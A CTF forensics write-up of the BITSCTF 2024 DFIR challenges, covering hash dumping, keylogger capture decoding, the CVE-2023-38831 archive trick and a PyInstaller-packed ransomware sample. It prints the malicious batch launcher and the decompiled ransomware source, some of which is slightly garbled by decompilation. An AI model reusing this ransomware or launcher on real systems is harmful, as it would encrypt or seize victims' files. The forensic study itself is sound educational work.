I participated in BITSCTF 2024 with my team. I'm so glad that we was 26th in scoreboard and I solved all the challenges of DFIR series with my teammates' support.
So here is my writeup for DFIR challenges
We have `artifacts.ad1`, `trace.pcap` and `memdump.mem` file for all of the DFIR challenges
### Access Granted!
> First things first. MogamBro is so dumb that he might be using the same set of passwords everywhere, so lets try cracking his PC's password for some luck.
I used volatility3 to dump NTLM hash from `memdump.mem`, then I search for it on this [link](https://ntlm.pw/) to "crack" the hash.
```bash
n3g4tee@ubuntu:~/volatility3$ python3 vol.py --file=../memdump.mem windows.hashdump
Volatility 3 Framework 2.6.0
Progress: 100.00 PDB scanning finished
User rid lmhash nthash
Administrator 500 aad3b435b51404eeaad3b435b51404ee 8a320467c7c22e321c3173e757194bb3
Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount 503 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount 504 aad3b435b51404eeaad3b435b51404ee 74d0db3c3f38778476a44ff9ce0aefe2
MogamBro 1000 aad3b435b51404eeaad3b435b51404ee 8a320467c7c22e321c3173e757194bb3
```
Flag: ***BITSCTF{adolfhitlerrulesallthepeople}***
### I'm wired in
> MogamBro got scared after knowing that his PC has been hacked and tried to type a SOS message to his friend through his 'keyboard'. Can you find the contents of that message, obviously the attacker was logging him!
I opened the `artifacts.ad1` by FTK imager and did some searching for malicious data. Then I saw the `keylog.pcapng` file in `C:\Users\MogamBro\Desktop` and i guessed it might be a USB HID data capture file which would let the attacker know what MogamBro had typed. I extract the file and using tshark to get the HID data of keyboard. We can write script to convert those keystrokes to characters that MogamBro had typed but in competition I used this tool for time-saving purpose.
```python
n3g4tee@ubuntu:~$ tshark -r ./keylog.pcapng -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > usbcapdata.txt
n3g4tee@ubuntu:~$ python3 usbkeyboard.py usbcapdata.txt
I havebeen hake !!!
HELMEE
BITSCTF{I_7h1nk_th3y_4Re_k3yl0991ng_ME!}
MogamBro
```
Flag: ***BITSCTF{I_7h1nk_th3y_4Re_k3yl0991ng_ME!}***
### 0.69 Day
> MogamBro was using some really old piece of software for his daily tasks. What a noob! Doesn't he know that using these deprecated versions of the same leaves him vulnerable towards various attacks! Sure he faced the consequences through those spam mails.
> Can you figure out the CVE of the exploit that the attacker used to gain access to MogamBro's machine & play around with his stuff.
There are two suspicious mails sent to MogamBro which one of them was attached two malicious files. (Btw 2 .eml file about mails are stored in `C:\Users\MogamBro\Documents\Outlook`). MogamBro downloaded the attachments as .zip and Lottery.exe in Downloads.
Unzip the file in my Ubuntu VM, I saw there is a folder and a file having same name, and inside the folder is a bat file. Open the bat file.
```bash!
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
@echo off
lottery.exe & start chrome -incognito https://pastebin.com/mPvzn0AD & notepad.exe secret.png.enc & curl google.com -o steps.pdf & steps.pdf
exit
```
So I knew that the CVE might be related to this zip file and the old piece of software(I guessed it was Outlook or WinRAR). After the some searching I came up with [CVE-2023-38831](https://nvd.nist.gov/vuln/detail/CVE-2023-38831)
Flag: ***BITSCTF{CVE-2023-38831}***
### Lottery
> Now that you know the CVE, figure out how the attacker crafted the payload & executed it to compromise the 'secret'.
The bat file executed the lottery.exe to do something with secret.png(or secret.png.enc ???). To know more about this I opened the lottery.exe in IDA to disassembler and I found out it was packed with PyInstaller. I asked my teammate to use `pyinstxtractor.py` to extract pyc then use Uncompyle6 and Decompyle++ to decompiler.
```python
# uncompyle6 version 3.5.0
# Python bytecode 3.8 (3413)
# Decompiled from: Python 3.7.2 (default, Dec 29 2018, 06:19:36)
# [GCC 7.3.0]
# Embedded file name: lottery.py
import os, tempfile
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
def generate_key():
key = os.urandom(32)
fp = tempfile.TemporaryFile(mode='w+b', delete=False)
fp.write(key)
return key
def encrypt_file--- This code section failed: ---
15 0 LOAD_STR 'urfuckedmogambro'
2 STORE_FAST 'iv'
17 4 LOAD_GLOBAL open
6 LOAD_FAST 'file_path'
8 LOAD_STR 'rb'
10 CALL_FUNCTION_2 2 ''
12 SETUP_WITH 66 'to 66'
14 STORE_FAST 'file'
18 16 LOAD_FAST 'file'
18 LOAD_METHOD read
20 CALL_METHOD_0 0 ''
22 STORE_FAST 'data'
19 24 LOAD_GLOBAL pad
26 LOAD_FAST 'data'
28 LOAD_GLOBAL AES
30 LOAD_ATTR block_size
32 CALL_FUNCTION_2 2 ''
34 STORE_FAST 'padded_data'
20 36 LOAD_GLOBAL AES
38 LOAD_METHOD new
40 LOAD_FAST 'key'
42 LOAD_GLOBAL AES
44 LOAD_ATTR MODE_CBC
46 LOAD_FAST 'iv'
48 CALL_METHOD_3 3 ''
50 STORE_FAST 'cipher'
21 52 LOAD_FAST 'cipher'
54 LOAD_METHOD encrypt
56 LOAD_FAST 'padded_data'
58 CALL_METHOD_1 1 ''
60 STORE_FAST 'encrypted_data'
62 POP_BLOCK
64 BEGIN_FINALLY
66_0 COME_FROM_WITH 12 '12'
66 WITH_CLEANUP_START
68 WITH_CLEANUP_FINISH
70 END_FINALLY
23 72 LOAD_FAST 'file'
74 LOAD_METHOD close
76 CALL_METHOD_0 0 ''
78 POP_TOP
25 80 LOAD_FAST 'file_path'
82 LOAD_STR '.enc'
84 BINARY_ADD
86 STORE_FAST 'encrypted_file_path'
26 88 LOAD_GLOBAL open
90 LOAD_FAST 'encrypted_file_path'
92 LOAD_STR 'wb'
94 CALL_FUNCTION_2 2 ''
96 SETUP_WITH 114 'to 114'
98 STORE_FAST 'encrypted_file'
27 100 LOAD_FAST 'encrypted_file'
102 LOAD_METHOD write
104 LOAD_FAST 'encrypted_data'
106 CALL_METHOD_1 1 ''
108 POP_TOP
110 POP_BLOCK
112 BEGIN_FINALLY
114_0 COME_FROM_WITH 96 '96'
114 WITH_CLEANUP_START
116 WITH_CLEANUP_FINISH
118 END_FINALLY
29 120 LOAD_GLOBAL os
122 LOAD_METHOD remove
124 LOAD_FAST 'file_path'
126 CALL_METHOD_1 1 ''
128 POP_TOP
Parse error at or near `BEGIN_FINALLY' instruction at offset 64
if __name__ == '__main__':
key = generate_key()
file_path = 'secret.png'
encrypt_file(file_path, key)
print('Dear MogamBro, we are fucking your laptop with a ransomware & your secret image is now encrypted! Send $69M to recover it!')
```
```python!
# Source Generated with Decompyle++
# File: lottery.pyc (Python 3.8)
import os
import tempfile
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
def generate_key():
key = os.urandom(32)
fp = tempfile.TemporaryFile('w+b', False, **('mode', 'delete'))
fp.write(key)
return key
def encrypt_file(file_path, key):
Unsupported opcode: BEGIN_FINALLY
iv = b'urfuckedmogambro'
# WARNING: Decompyle incomplete
if __name__ == '__main__':
key = generate_key()
file_path = 'secret.png'
encrypt_file(file_path, key)
print('Dear MogamBro, we are fucking your laptop with a ransomware & your secret image is now encrypted! Send $69M to recover it!')
```
Both Uncompyle6 and Decompyler met error in decompiling the encrypted_file function. Fortunately we could know that it was a ransomware and it used AES-CBC to encrypt the `secret.png` with *iv = urfuckedmogambro* and the 32-bytes key was randomly generated in temporary file. I searched in `C:\Users\AppData\Local\Temp` and `tmpd1tif_2a` is the only file with 32 bytes => this is the key.
Use CyberChef to decrypt the encrypted png file.
Flag: ***BITSCTF{1_r3c3ived_7h3_b0mbz}***
*After the event*: From others'DFIR write up I learned that decompiling the pyc on Windows (using the [Uncompyle6.exe](https://github.com/extremecoders-re/uncompyle6-builds) can recover all the python code including encrypted_file function (I don't know why is it but maybe I should try to do on both Windows and Linux/WSl next time ._.)
```python!
PS D:\tools\uncompyle6-x86_64> .\uncompyle6.exe D:\CTF\BitsCTF\lottery.exe_extracted\lottery.pyc
# uncompyle6 version 3.9.0
# Python bytecode version base 3.8.0 (3413)
# Decompiled from: Python 3.10.8 (main, Nov 6 2022, 02:23:43) [MSC v.1929 64 bit (AMD64)]
# Embedded file name: lottery.py
import os, tempfile
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
def generate_key():
key = os.urandom(32)t
fp = tempfile.TemporaryFile(mode='w+b', delete=False)
fp.write(key)
return return key
def encrypt_file(file_path, key):
iv = b'urfuckedmogambro'
with open(file_path, 'rb') as (file):
data = file.read()
padded_data = pad(data, AES.block_size)
cipher = AES.new(key, AES.MODE_CBC, iv)
encrypted_data = cipher.encrypt(padded_data)
file.close()
encrypted_file_path = file_path + '.enc'
with open(encrypted_file_path, 'wb') as (encrypted_file):
encrypted_file.write(encrypted_data)
os.remove(file_path)
if __name__ == '__main__':
key = generate_key()
file_path = 'secret.png'
encrypt_file(file_path, key)
print('Dear MogamBro, we are fucking your laptop with a ransomware & your secret image is now encrypted! Send $69M to recover it!')
# okay decompiling D:\CTF\BitsCTF\lottery.exe_extracted\lottery.pyc
```
### MogamBro's guilty pleasure
> MogamBro was spammed with a lot of emails, he was able to evade some but fell for some of them due to his greed. Can you analyze the emails & figure out how he got scammed, not once but twice!
I already had known there is 2 malicious emails before so I checked the other. I found something strange with the text and its content to (It was repetitive) and no idea about if this email made something harmful on his PC. I stucked at this challenge quite a long time until my brother pointed out it is `spam mimic` (huhu thank you so much)
So just copy the mail to this [web](https://www.spammimic.com/) and get the flag.
Flag: ***BITSCTF{sp4m_2_ph1sh_U}***
### Bypassing Transport Layer
> The exploit not only manipulated MogamBro's secret but also tried to establish an external TCP connection to gain further access to the machine. But I don't really think he was able to do so. Can you figure out where the exploit was trying to reach to?
Check the console history in ```C:\Users\MogamBro\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt```
```
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE","C:\Users\MogamBro\Desktop\keys","MACHINE")
netsh trace start capture=yes tracefile=C:\Users\MogamBro\Desktop\trace.etl report=disabled`
netsh trace stop
cd C:\Users\MogamBro\Desktop\
.\etl2pcapng.exe .\trace.etl trace.pcap
```
So we knew the keys file in `C:\Users\MogamBro\Desktop\` can be used to decrypt traffic in `trace.pcap`, so open the pcap file by Wireshark and import the key file to decrypt TLS packets.
I think this solution is a unintended way. At that time I was confused with the description and also there was no flag format for this challenge, so I thought the full flag was in the traffic. I searched packet which contains 'BITSCTF{' and it worked =)))
Flag: ***BITSCTF{5te4l1ng_pr1v47e_key5_ez:)}***
Sign in with Wallet
Connect another wallet